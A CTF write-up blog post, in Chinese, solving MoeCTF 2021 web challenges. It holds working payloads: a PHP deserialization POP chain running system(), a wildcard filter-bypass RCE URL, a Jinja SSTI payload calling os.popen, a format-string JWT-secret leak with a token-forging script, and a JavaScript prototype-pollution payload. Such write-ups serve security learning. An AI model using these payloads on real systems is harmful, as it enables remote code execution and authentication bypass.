Moectf2021web题解

最新推荐文章于 2023-11-27 23:15:29 发布
最新推荐文章于 2023-11-27 23:15:29 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: ctf题解 文章标签: python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45845771/article/details/120516827
版权

[toc]

eeeeeeeeeeezunserialize

知识点:

pop链的构造:主要看这篇文章https://paper.seebug.org/1480/

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7fWdPkQI-1632746009325)(C:\Users\yuan\AppData\Roaming\Typora\typora-user-images\image-20210906180953364.png)]

POC

<?php

class entrance
{
    public $start;

}

class springboard//跳板ne
{
    public $middle;
   
}

class evil
{
    public $end;
}
$a=new entrance();
$a->start=new springboard();
$a->start->middle=new evil();

// $a->start->middle->end='$_GET[\'a\'];';
$a->start->middle->end='system(\'cd ..;cd ..;cd ..;ls;cat flag;ls\');';

echo serialize($a);
?>

babeRCE

RCE, remote code execution,泛指能在远端机器上执行任意代码的情况。可是网站管理员添加了种种入侵检测,这该如何是好?

知识点:通配符,linux命令

通配符绕
在这里插入图片描述

[<http://47.93.215.154:5000/?rce=/>](<http://47.93.215.154:5000/?rce=/>)???/c?t${IFS}fla?.php

让 我 访 问

在注册页面发现有跳转,抓包发现可能有ssti

payload:{{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}

在这里插入图片描述

地狱通讯-改

打开题目直接给了源码:

这个页面主要有两个函数,第一个函数过滤了’admin’,并设置cookie留给第二个函数使用,第二个函数又只能用admin访问flag,所以我们可以通过format的漏洞去伪造处admin的token,主要用处就是去读取jwt加密的secret密钥和header

首先获取普通用户的tokentoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoidXNlciJ9.ghbUg6IQbe5deetNUql48wZDf03LeZeMbNq0MXc0amU

然后带着cookie访问

/hello?flag={0.__class__.__init__.__globals__}

获得密钥isu_have_kn0w_what_f0rmat_i5和headers:{‘alg’: ‘HS256’, ‘typ’: ‘JWT’}

利用python 的jwt加密伪造token,带着token访问成功登录。

import jwt
payload = {"name": 'admin', }
secret = 'u_have_kn0w_what_f0rmat_i5'
headers = {'alg': 'HS256', 'typ': 'JWT'}
token = jwt.encode(payload, secret, algorithm='HS256', headers=headers)
print(token)

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiYWRtaW4ifQ.ONh7uQwunkVjB4_ZwuLNIHBGbciqLAtJxQF81elyqBc

image-20210926224542492

参考:

Python格式化字符串研究

moeCTF_2021

地狱通信

同上

fake game

js原型链污染,使用merge函数时,但对象原型json格式作为键名时,可以改变原来类的属性。

payload:{"attributes": {"health": 0, "attack": 0, "armor": 0, "__proto__": {"health": 10000, "attack": 10000, "armor": 10000}}}

雨落新痕
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
西普WEB大部分题解
12-09
西普WEB大部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
2021-10-3 安全笔记周报(php 反序列化的两道例题)(待更新)
m0_54481455的博客
10-03 4584
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
学习记录-反序列化
2301_80028001的博客
11-27 158
_construct(): 在创建对象时自动调用。__destruct(): 在销毁对象时自动调用。__call(): 当调用一个不存在的方法时自动调用。__callStatic(): 当调用一个不存在的静态方法时自动调用。__get(): 当读取一个不存在的属性时自动调用。__set(): 当设置一个不存在的属性时自动调用。__isset(): 在使用isset()或empty()函数判断一个不存在的属性时自动调用。
PHP反序列化刷题(2)
mo2901600657的博客
11-22 72
今天课比较多,只刷了4个题还是反序列化。明天继续反序列化。
MoeCTF_2023新生赛 Reverse题解WP【详解】-(学习记录)‘‘
Sciurdae的博客
10-21 919
MoeCTF是我学习Re以来接触的第一个比赛!举办的很nice!(づ ̄3 ̄)づ╭❤~明年看看有没有时间,akakak要ak一次才完整a!Github仓库题目下载还差几题,有空补上,还需努力。
MoeCTF 2021Re部分------baby_bc
寻梦&之璐
10-20 618
文章目录baby.bc编译ida分析Rc4初始化加密Base64变形结果数组解密代码: baby.bc 编译 llc chall.bc -o chall.s 然后把.s(汇编代码搞成可执行程序)在进行编译的时候出现了如下报错: gcc -c chall.s -o hello 报错如下: chall.s: Assembler messages: chall.s:4: Error: unknown pseudo-op: `.def' chall.s:5: Error: unknown pseudo-o
西邮linux小组2021题解
11-07
西邮linux小组2021题解
2021年mathorcupD题解题思路-参考资料代码.zip
09-07
2021年mathorcupD题解题思路-参考资料代码
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
2021天梯赛题解1
08-03
2021 天梯赛题解赵长乐 王小川2021 年 4 月 30 日目录目录L1-3 强迫症L1-6 吉老师的回归L1-7 天梯赛的善良L1-8 乘法口诀数列L2-
[MoeCTF 2021]——Web方向 wp
Leaf_initial的博客
08-09 1399
这里注意必须是0才可以,因为只有一个f1Ag的值往进传,所以前后必须是一样的,如果为其他数字的话需要俩个变量往进传。中的值代入进去,然后找到他的所属类,然后找到FLAG中的全局变量flag。__get() :获得一个类的不可访问或者不存在的成员变量时调用。__call():在对象上下文中调用不可访问的方法时触发。这里不多阐述原型链污染的概念了,可以去看p神的文章。提示我们可以有十点属性来分配,分配肯定是打不过的。游戏题,要求我们打到5w分,基本上是达不到的。在源码中找到控制分数的属性,
NSSCTF题库[MoeCTF 2021-2022]系列
J1ng_Hong的博客
08-08 1245
环境页面,让我们直接来查看源码就完事了看它的完成条件,白给题。
NSSCTF web刷题记录6
rev1ve的博客
11-21 466
引用了vm2,有JSON.parse解析,并且存在merge方法,clone调用了merge,存在原型链污染漏洞。直接去网上找相关漏洞,发现是CVE-2021-26120(说是此版本修复但也不知道为啥能用)路由下接收name参数,如果存在且值不为admin,将输出JWT加密的token值;路由接收参数token,然后进行解密,如果为admin返回flag。然后把密钥放到我们解密网站,验证成功,我们直接修改为admin。中,.匹配除了换行符以外的所有字符,postmanPOST发送即可。
MoeCTF 2021--Web_Inc
qq_46263951的博客
09-08 736
这里就简单记录一下这个题, <?php error_reporting(0); include_once "flag.php"; $a=$_GET['a']; $b=$_POST['b']; if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try again'; } }else{ highlight_file(__FILE_.
ssti注入进阶
十一.的博客
11-23 88
settings中存在cookie_secret。Tornado框架的附属文件。
2021西电MoeCTF
little_L_A的博客
09-27 2080
MOECTF新生赛wpwebweb_Lnc web web_Lnc 题目 <?php error_reporting(0); include_once "flag.php"; $a=$_GET['a']; $b=$_POST['b']; if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try again'; } }else{ hi
http
ytl_storm的博客
08-17 63
http协议。
MoeCTF2022 部分Crypto 复现
Luiino的博客
11-05 2747
用基础方法解不出来,原因是e与phi_n不互素,又phi_n = (p-1)*(q-1),求gcd(e,(p-1))和gcd(e,(q-1)),发现e与p-1互素。choice用法:从非空序列中随机选取一个数据并带回,该序列可以是list、tuple、str、set。,计算delt + N是否为完全平方数,如果为完全平方数,那么delt + N =Wilson定理:如果p是素数,则(p − 1)!可以知道p、q相近,则|p-q|很小,进而。因此,我们可以爆破差值delt,即。与 N 相差很小,从而。
moeCTF题解-0x03】Algorithm
框架科工:Framecraft
11-03 726
title: 【moeCTF题解-0x03】Algorithm categories: CTF moeCTF tags: CTF 【moeCTF题解-0x03】Algorithm 计算是宇宙的本质 (并不) 这部分主要是一些数据处理题和算法题。 数据处理题用Python做较为容易。 算法题要求用C++,我不太擅长;又因都是一些经典的题目,万维网上其他大佬的题解很多,故没有去做,这个题解中会放一些其他人题解的链接。 【moeCTF题解】总目录如下: 【moeCTF题解-0x00】序 .
洛谷B2021python题解
最新发布
12-23
很抱歉,我无法提供洛谷B2021python题解的具体内容,因为我无法访问引用中的题目。但是,我可以为您提供一些关于洛谷B2021python题解的一般指导。 洛谷是一个在线的编程练习平台,提供了各种编程题目供用户练习和挑战。B2021python是洛谷上的一个题目集合,其中包含了多个与Python编程相关的题目。 要解决洛谷B2021python题目,您可以按照以下步骤进行: 1. 首先,了解Python编程语言的基础知识,包括语法、数据类型、控制流等内容。可以通过学习Python的教程或参考资料来掌握这些知识。 2. 然后,逐个尝试解决洛谷B2021python题目。可以从简单的题目开始,逐渐提高难度。在解题过程中,可以运用已学的Python知识和编程技巧,思考如何实现题目要求。 3. 如果遇到困难或不理解的地方,可以查阅相关的Python文档、教程或向其他有经验的程序员寻求帮助。还可以参考洛谷上其他用户的解题思路和代码,借鉴他们的经验。 4. 最后,提交您的解答代码,并查看洛谷系统给出的反馈和评分。如果答案正确,您将获得相应的分数和排名。 总之,解决洛谷B2021python题目需要掌握Python编程基础知识,并具备一定的编程思维和解题能力。通过不断练习和学习,您可以提高自己的Python编程水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值